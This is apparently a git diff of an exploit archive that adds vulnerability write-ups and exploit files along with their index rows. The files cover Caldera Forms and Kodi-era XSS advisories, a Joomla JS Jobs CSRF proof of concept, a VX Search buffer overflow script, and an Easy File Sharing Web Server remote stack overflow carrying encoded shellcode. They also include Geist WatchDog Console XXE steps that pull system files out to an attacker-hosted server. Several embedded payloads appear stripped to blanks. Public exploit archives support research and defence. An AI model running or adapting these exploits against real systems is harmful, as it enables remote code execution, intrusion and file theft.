100,000+ active installations at the moment of this +writing. + + + +2) VULNERABILITY OVERVIEW +The application fails to validate user-supplied input, hence it stores the +unsanitized buffer in the database. +The vulnerabilities reported here will be exploitable ONLY if certain +conditions are met, which is not the case in a CF's default configuration +(although still being vulnerable). + +A note on buffers containing strings: + single (') and double (") quotes are correctly escaped, backticks (`) +are not. + + + +3) DETAILS + +3.a) Stored XSS - public +When submitting a CF form, the plugin will show a greeting message to +notify the user that everything went ok. +This message is editable by the site's admin and can contain part of the +user-supplied data (e.g. they're first name). In this case, simply inject +HTML code into the parameter which gets returned in the greeting message +and submit the POST request. A JSON response will follow, containing, among +other data: +- the greeting message ("html", which contains the malicious payload that +gets executed right away) +- form's ID ("form_id") +- data's ID ("cf_id") + +{ + "data":{"cf_id":""}, + "html":"", + "type":"...", + "form_id":"", + "form_name":"...", + "status":"..." +} + +At this point, to reach the stored XSS, simply build a GET request using +the obtained data. +The malicious payload will be found at + + http(s):///cf-api//?cf_su=1&cf_id= + +Vulnerable config: + - form > form settings > capture entries > checked (ON by default) + - form > form settings > success message > add some of the user +supplied fields (absent by default) + +To replicate this on a fresh install: + - Create a new, default, contact form + - Go to "Form Settings" tab and edit the success message to include, +for example, the user's first name. +e.g.: Form has been successfully submitted. Thank you %first_name%. + - Save & publish + - As an unauthenticated user, submit the contact form injecting HTML +code in first name's parameter. XSS will be triggered right away + - To recall the payload as a stored XSS, read the POST's response and +point your browser to + /cf-api//?cf_su=1&cf_id= + + + +3.b) Stored XSS - admin interface +CalderaForms gives the ability to notify the admin via email everytime a +form gets submitted. +Furthermore, an admin can choose to enable an "email transacion log" for +debugging purposes (disabled by default). +If this configuration is in place, a copy of the malicious payload +described above will be shown in the administration panel, when visiting +that form's malicious entry's details. + +Vulnerable config: + - form > form settings > capture entries > checked (ON by default) + - form > email > debug mailer > checked (OFF by default) + +To replicate this on a fresh install: + - Enable the transaction log (form -> edit -> email tab -> check +"Enable email send transaction log") + - Replicate the injection described at 3.a (all fields can be used this +time) as an unauthenticated user + - Back again in the admin interface, visit form's entries, identify the +malicious one and click on the "view" button + + This will pop a details window and trigger the XSS. + + + +3.c) Importing a weaponized form - admin interface +CalderaForms gives the ability to import a form (JSON format). +A malicious form field can be crafted which will trigger an XSS when said +field gets displayed/edited after the import. + +It's worth noting that this flaw does not depend on custom configurations, +although it's not "remotely" and "automatically" exploitable. The problem +here arise, for example, when an admin imports a malicious JSON. + +To replicate this on a fresh install: + - Create a form and export it (JSON format) + - Edit the json and inject HTML code. "label" and "slug" parameters +were tested, others may be vulnerable too. + e.g.: + { + ... + "label":"First Name", + "slug":"first_name\"/>" + ... + } + + - Import the malicious form to trigger the XSS in the administration +interface + + + +4) REMEDIATION +Update to the latest version available. + +If any personalized configuration is found exploitable, the following steps +can be followed, as a temporary mitigation strategy, if no update is +available or updating is not an option, for whatever reason: + - for every form, under "Form Settings", prune every variable that gets +returned to the user as a success message + - for every form, under the "Email" tab, un-check "Enable email send +transaction log" + - for every form that gets imported perform a thorough review + + + +5) TIMELINE & FINAL NOTES + + 02-03-18 > vendor gets notified + 06-03-18 > vendor replies + 07-03-18 > CVE requested and assigned + 27-03-18 > patch released + 27-03-18 > vulnerability disclosed + +Special thanks go to Josh Pollock and his team, from Caldera, who invested +passion and energy in understanding and patching these issues. \ No newline at end of file diff --git a/exploits/php/webapps/44492.txt b/exploits/php/webapps/44492.txt new file mode 100644 index 000000000..85860053c --- /dev/null +++ b/exploits/php/webapps/44492.txt @@ -0,0 +1,68 @@ +####################################### +# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities +# Google Dork: N/A +# Date: 17-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni# +####################################### +# Author Blog : http://nullnews.in +# Vendor Homepage: https://www.joomsky.com +# Software Link: https://extensions.joomla.org/extension/js-jobs/ +# Affected Version: 1.2.0 +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : NA +####################################### + +1. Vendor Description: + +JS Jobs for any business, industry body or staffing company wishing to +establish a presence on the internet. JS Jobs allows you to run your own, +unique jobs classifieds service where you or employer can advertise their +jobs and job seekers can upload their Resumes. + +2. Technical Description: + +The state changing actions in JS Jobs before 1.2.1 not having any random +token validation which results in Cross Site Request Forgery Vulnerability. + +3. Proof of Concept: + +Delete Job Entry [Super Admin Access] + + + + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + + +4. Solution: + +Update to latest version + +https://extensions.joomla.org/extension/js-jobs/ \ No newline at end of file diff --git a/exploits/windows/dos/44494.py b/exploits/windows/dos/44494.py new file mode 100755 index 000000000..afc110c3e --- /dev/null +++ b/exploits/windows/dos/44494.py @@ -0,0 +1,23 @@ +#!/usr/bin/python +# Title: VX Search 10.6.18 Local Buffer Overflow +# Author: Kevin McGuigan +# Twitter: @_h3xagram +# Author Website: https://www.7elements.co.uk +# Vendor Website: http://www.vxsearch.com +# Version: 10.6.18 +# Date: 18/04/2018 +# Tested on: Windows 7 32-bit +# Vendor did not respond to advisory. + +# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field. + +filename="vxsearchPOC.txt" +junk = "A"*271 +#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll) +#eip="\x1a\x2a\x2c\x65" +eip = "B" * 4 +fill = "C" *900 +buffer = junk + eip + fill +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows/remote/44485.py b/exploits/windows/remote/44485.py new file mode 100755 index 000000000..e0fe1aa14 --- /dev/null +++ b/exploits/windows/remote/44485.py @@ -0,0 +1,67 @@ +# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow +# Date: 03/24/2018 +# Exploit Author: rebeyond - http://www.rebeyond.net +# Vendor Homepage: http://www.sharing-file.com/ +# Software Link: http://www.sharing-file.com/efssetup.exe +# Version: 7.2 +# CVE: CVE-2018-9059 +# Tested on: Windows XP Professional SP3 +# +# Description: +# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned +# +# +# The stack trace is as follows: +# (40d8.2980): Access violation - code c0000005 (first chance) +# r +# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0 +# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll - +# sqlite3!sqlite3_errcode+0x8e: +# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=???????? +# +# kb +# ChildEBP RetAddr Args to Child +# WARNING: Stack unwind information not available. Following frames may be wrong. +# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e +# *** WARNING: Unable to verify checksum for fsws.exe +# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe +# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282 +# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4 +# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3 + + +import requests +host='192.168.50.30' +port='80' + +buf='A'*4071 +buf +='\x12\x45\xfa\x7f' #jmp esp +buf +='A'*12 +buf +='\xeb\x36' #jmp 0x36 +buf +='A'*42 +buf +='\x60\x30\xc7\x61'*2 #must be valid address +buf +='A'*4 +#shellcode to execute calc.exe on remote server +buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33" +buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45" +buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2" +buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf" +buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93" +buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9" +buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58" +buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a" +buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe" +buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66" +buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd" +buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43" +buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9" +buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d" +buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19" +buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6" +buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88" + +cookies = dict(SESSIONID='6771', UserID=buf,PassWD='') +data=dict(frmLogin='',frmUserName='',frmUserPass='',login='') +requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data) \ No newline at end of file diff --git a/exploits/xml/webapps/44493.txt b/exploits/xml/webapps/44493.txt new file mode 100644 index 000000000..e15eca059 --- /dev/null +++ b/exploits/xml/webapps/44493.txt @@ -0,0 +1,97 @@ +# Exploit Author: bzyo +# CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079 +# Twitter: @bzyo_ +# Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities +# Date: 04-17-18 +# Vulnerable Software: WatchDog Console - 3.2.2 +# Vendor Homepage: http://www.itwatchdogs.com/ +# Version: 3.2.2 +# Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe +# Tested On: Windows 7 x86 + +Description +----------------------------------------------------------------- +WatchDog Console suffers from multiple vulnerabilities: + +# CVE-2018-10077 Authenticated XML External Entity (XXE) +# CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) +# CVE-2018-10079 Insecure File Permissions + +Prerequisites +----------------------------------------------------------------- +To successfully exploit these vulnerabilities, an attacker must already have access +to a system running WatchDog Console using a low-privileged user account + +Proof of Concepts +----------------------------------------------------------------- +### CVE-2018-10079 Insecure File Permissions ### +By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and +gives 'Authenticated Users' group Modify permissions + +C:\>icacls "c:\ProgramData\WatchDog Console" +c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC) + +This allows any local user of the system the ability to reset the application admin password by generating +a password using the PHP md5() function and updating the config.xml file. It also provides the ability to +add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface + +### CVE-2018-10077 Authenticated XML External Entity (XXE) ### +With authenticated admin access to the application or local access to the system, a user has the ability to read +system files remotely through XXE + +On attacking machine +- Create data.xml with following contents in apache root and start apache listening on 80 + + + + %sp; + %param1; + ]> + &exfil; + +- Create evil.xml with the following contents anywhere + + + "> + +- Start python simple http server in same directory as evil.xml, listening on 8080 + python -m SimpleHTTPServer 8080 + +On victim machine (1 of 2 ways) +1. With admin access to application console, add attacking server IP address under servers tab +or +2. With local access to system + - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: + + + + + - restart system + +On attacking machine +- Contents of 'win.ini' is outputted to console +- evil.xml can be updated to read other sensitive files (tested reading file from admin desktop) + +### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ### +This application suffers from authenticated XSS on several inputs (1 of 2 ways) +1. With admin access to application console, under servers tab + - add dummy IP in server name filed + - add "> into server description +or +2. With local access to system + - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: + + + " selEmail="True" Username="1" Password="1" left="400" top="180" /> + + - restart system + +3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot. + +Timeline +--------------------------------------------------------------------- +04-14-18: Vendor notified of vulnerabilities +04-16-18: Vendor responded "Thank you for bringing this to our attention. The product has now been End-of-life for +several years and is no longer receiving updates." +04-17-18: Submitted public disclosure \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b411eb0c0..6487d1450 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5938,6 +5938,9 @@ id,file,description,date,author,type,platform,port 44466,exploits/windows/dos/44466.txt,"Microsoft Windows - 'CiSetFileCache' TOCTOU Incomplete Fix",2018-04-16,"Google Security Research",dos,windows, 44467,exploits/windows/dos/44467.txt,"Microsoft Edge - 'OpenProcess()' ACG Bypass",2018-04-16,"Google Security Research",dos,windows, 44468,exploits/windows/dos/44468.py,"Zortam MP3 Media Studio 23.45 - Local Buffer Overflow (SEH)",2018-04-16,"Kevin McGuigan",dos,windows, +44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux, +44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple, +44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16413,7 +16416,8 @@ id,file,description,date,author,type,platform,port 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware, 44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows, 44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware, -44482,exploits/php/remote/44482.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80 +44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80 +44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39095,6 +39099,7 @@ id,file,description,date,author,type,platform,port 44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware, 44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware, 44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php, +44320,exploits/hardware/webapps/44320.txt,"Coship RT3052 Wireless Router - Persistent Cross-Site Scripting",2018-03-20,"Sayan Chatterjee",webapps,hardware, 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple, 44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml, 44346,exploits/php/webapps/44346.rb,"ClipBucket - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php, @@ -39169,7 +39174,15 @@ id,file,description,date,author,type,platform,port 44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php, 44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php, 44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux, -44449,exploits/php/webapps/44449.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php, +44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php, 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp, 44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php, +44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80 +44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php, +44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80 +44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple, +44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware, +44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80 +44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80 +44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,